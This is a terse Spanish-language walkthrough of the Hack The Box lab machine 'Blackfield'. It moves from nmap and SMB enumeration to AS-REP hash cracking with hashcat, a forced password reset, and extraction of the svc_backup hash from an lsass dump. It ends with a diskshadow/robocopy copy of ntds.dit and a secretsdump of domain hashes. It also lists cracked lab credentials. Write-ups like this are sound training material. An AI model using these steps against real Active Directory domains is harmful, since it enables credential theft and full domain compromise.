Blackfield
| Sistema operativo | Dificultad | Fecha de Lanzamiento | Creador |
|---|---|---|---|
| Windows | Hard | 06 Junio 2020 | aas |
Escaneo de puertos
nmap -sS -p- --open -Pn -n --min-rate 5000 -oG openPorts -vvv 10.10.10.192
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-15 22:11 -03
Initiating SYN Stealth Scan at 22:11
Scanning 10.10.10.192 [65535 ports]
Discovered open port 135/tcp on 10.10.10.192
Discovered open port 445/tcp on 10.10.10.192
Discovered open port 53/tcp on 10.10.10.192
Discovered open port 5985/tcp on 10.10.10.192
Discovered open port 389/tcp on 10.10.10.192
Discovered open port 88/tcp on 10.10.10.192
Discovered open port 593/tcp on 10.10.10.192
Discovered open port 3268/tcp on 10.10.10.192
Completed SYN Stealth Scan at 22:12, 27.11s elapsed (65535 total ports)
Nmap scan report for 10.10.10.192
Host is up, received user-set (0.27s latency).
Scanned at 2025-04-15 22:11:34 -03 for 27s
Not shown: 65527 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 27.20 seconds
Raw packets sent: 131079 (5.767MB) | Rcvd: 25 (1.100KB)
Enumeración de versión y servicio
nmap -sCV -p53,88,135,389,445,593,3268,5985 -oN servicesScan 10.10.10.192
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-15 22:13 -03
Nmap scan report for 10.10.10.192 (10.10.10.192)
Host is up (0.23s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-16 08:13:13Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-04-16T08:13:28
|_ start_date: N/A
|_clock-skew: 6h59m59s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.73 seconds
Explotación inicial
echo "10.10.10.192 BLACKFIELD.local DC01.BLACKFIELD.local" >> /etc/hosts
Enumeración de recursos compartidos.
Encontramos directorios con nombres de posibles usuarios del dominio.
smbclient //10.10.10.192/profiles$ -N -c 'dir' | awk '{print $1}' | grep -Ev '\.|\.\.|5102079' | sed -e '/^$/d' > ad_users.txt
support -> audit2020
hashcat -m 18200 hash.kerberoast /usr/share/wordlists/rockyou.txt
support:#00^BlackKnight
Enumeración a través de BloodHound.
net rpc password 'audit2020' 'Password123!' -U 'BLACKFIELD.local'/'support'%'#00^BlackKnight' -S 10.10.10.192
audit2020
pypykatz lsa minidump lsass.DMP
svc_backup:9658d1d1dcd9250115e2205d9f48400d
Escalación de privilegios (root / SYSTEM)
whoami /groups
mkdir C:\temp
cd C:\Temp
upload archivo.dsh
cmd.exe /c "diskshadow /s archivo.dsh"
robocopy /b z:\windows\ntds . ntds.dit
impacket-secretsdump -sam sam -system system -ntds ntds.dit LOCAL -outputfile blackfield.hashes
